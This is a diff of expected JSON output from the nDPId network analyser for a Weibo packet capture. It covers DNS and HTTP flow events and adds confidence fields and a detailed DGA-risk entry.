 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1463089072885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089072885,"pkt":"kDVu60UQeJKcD6iOCABFAAA8J\/lAAEARjv3AqAFpwKgBAaGIADUAKAcnK+gBAAABAAAAAAAAAmpzAXQGc2luYWpzAmNuAAABAAE="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1463089073286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1463089073286,"pkt":"kDVu60UQeJKcD6iOCABFAABDKCFAAEARjs7AqAFpwKgBAUZzADUAL2deWFEBAAABAAAAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KCJAAEARjtHAqAFpwKgBAcXQADUAK4SVO9YBAAABAAAAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAE="}
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA6KCNAAEARjtXAqAFpwKgBAcjwADUAJqqk8RABAAABAAAAAAAAAWcGYWxpY2RuA2NvbQAAAQAB"}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KCRAAEARjtLAqAFpwKgBAdDaADUAKHiskZsBAAABAAAAAAAAA2xvZwZtbXN0YXQDY29tAAABAAE="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1463089073289,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1463089073289,"pkt":"kDVu60UQeJKcD6iOCABFAAA+KCVAAEARjs\/AqAFpwKgBAYQeADUAKn2XkPcBAAABAAAAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAQ=="}
-00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -102,38 +103,38 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"}
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"}
-00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
